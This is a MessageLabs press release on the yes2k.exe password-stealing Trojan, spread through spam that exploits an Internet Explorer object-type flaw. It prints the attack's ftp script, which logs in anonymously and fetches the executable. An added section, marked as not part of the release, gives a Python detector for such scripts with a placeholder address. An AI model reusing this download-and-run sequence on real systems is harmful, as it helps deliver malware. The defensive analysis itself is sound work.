New Trojan Demonstrates Increasing Complexity Of Converged Email Security Threats

London, 11 May. MessageLabs, the leading provider of managed email security services to businesses, is today urging global email users to be alert to the increasing sophistication of different email security threats that are resulting from the convergence of virus and spamming techniques.
The warning comes further to MessageLabs’ identification of a new password-stealing Trojan – filename yes2k.exe – which had attempted to spread via the use of spamming techniques.

MessageLabs was alerted to the threat when it detected a spam outbreak that uses the Microsoft Internet Explorer object data exploit (1) to download an html script from a particular IP address. This creates and runs an ftp script to download and run yes2k.exe.

Recently, spammers seeking to gain as wide an audience as possible for their messages have taken to employing virus-writing techniques to propagate their information. However, in this case, the approach has been turned on its head and it is the malicious code that is being spread after the spam has seeded the distribution network.

Spam is more prevalent than viruses: in April MessageLabs scanned 841.1 million emails and found that while 67% were spam, just 9% were infected with viruses.

Paul Wood, MessageLabs’ Chief Information Analyst, says:

“All the evidence shows that the lines between the different types of email security threat are becoming increasingly blurred. Viruses, Trojans and spam in particular are being thrown into the melting pot to create an increasingly sophisticated variety of email security threat. This technique is known as convergence, and we should expect to see rising numbers of converged threats in the future. In order to protect themselves, businesses need to ensure that they have a solution capable of guarding against all email security threats – whether they are in their simplest form or deployed as part of a converged attack.”

Details of yes2k.exe:

    Open (IP address)
    ftp
    any@any.net
    bin
    lcd C:
    get yes2k.exe
    bye

yes2k is a password stealer packed with a modified version of UPX.
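
A defender's view of the ftp script above, as an added example that is not part of the MessageLabs release: a small Python check that flags ftp command scripts which log in non-interactively and fetch an executable. The function names, the extension list and the 192.0.2.10 placeholder address are assumptions made for illustration.

```python
import re

# Constructed sample modelled on the script listed above; 192.0.2.10 is a
# documentation-range placeholder for the address the release withholds.
SAMPLE_SCRIPT = """open 192.0.2.10
ftp
any@any.net
bin
lcd C:
get yes2k.exe
bye
"""

EXEC_EXT = (".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".dll")
IP_LITERAL = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")

def analyse_ftp_script(text):
    """Return (tag, detail) findings for an ftp command script.

    Assumption: the client runs the script with auto-login enabled, so the
    two lines after `open` answer the user name and password prompts.
    """
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    findings, binary, i = [], False, 0
    while i < len(lines):
        cmd, *args = lines[i].split()
        cmd = cmd.lower()
        if cmd == "open" and args:
            if IP_LITERAL.match(args[0]):
                findings.append(("server-is-ip-literal", args[0]))
            if len(lines) > i + 2:
                findings.append(("embedded-login", lines[i + 1]))
            i += 3  # skip the user name and password lines
            continue
        if cmd in ("bin", "binary"):
            binary = True
        elif cmd in ("get", "recv", "mget") and args:
            # Check the remote name and, if given, the local name.
            if any(a.lower().endswith(EXEC_EXT) for a in args):
                mode = "binary" if binary else "default"
                findings.append(("fetches-executable", f"{args[0]} ({mode})"))
        i += 1
    return findings

def is_suspicious(text):
    """Flag scripts that log in non-interactively and pull an executable."""
    tags = {tag for tag, _ in analyse_ftp_script(text)}
    return {"embedded-login", "fetches-executable"} <= tags
```

On a host, the same check can be pointed at small text files written shortly before an ftp client process starts.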

Detection

MessageLabs detected all strains of this virus proactively, using its unique and patented Skeptic™ predictive heuristics technology.

1) http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0532

Internet Explorer 5.01 SP3 through 6.0 SP1 does not properly determine object types that are returned by web servers, which could allow remote attackers to execute arbitrary code via an object tag with a data parameter to a malicious file hosted on a server that returns an unsafe Content-Type, aka the “Object Type” vulnerability.

About MessageLabs

MessageLabs is the leading provider of managed email security services to businesses worldwide. The company has more than 54 per cent market share of the managed email security services market. MessageLabs currently protects more than 8,500 businesses worldwide, protecting more than 2 million business end users from email security threats such as viruses, spam and other unwanted content before they reach their networks and without requiring additional hardware or software. Powered by a global network of over 80 control towers with 1500 servers that spans Australia, the United States, the United Kingdom, Hong Kong, Singapore, Germany, Belgium and the Netherlands, MessageLabs scans up to 45 million emails a day on behalf of customers such as QBE Insurance, Daiwa, Voyages Hotels and Resorts, Mandarin Oriental Hotels, Sanitarium, SunWater, The British Government, Fujitsu, The Bank of New York, Conde Nast Publications, StorageTek, EMI Music and Diageo.

For more information on MessageLabs and its industry-leading email security and management services, please visit http://www.messagelabs.com.
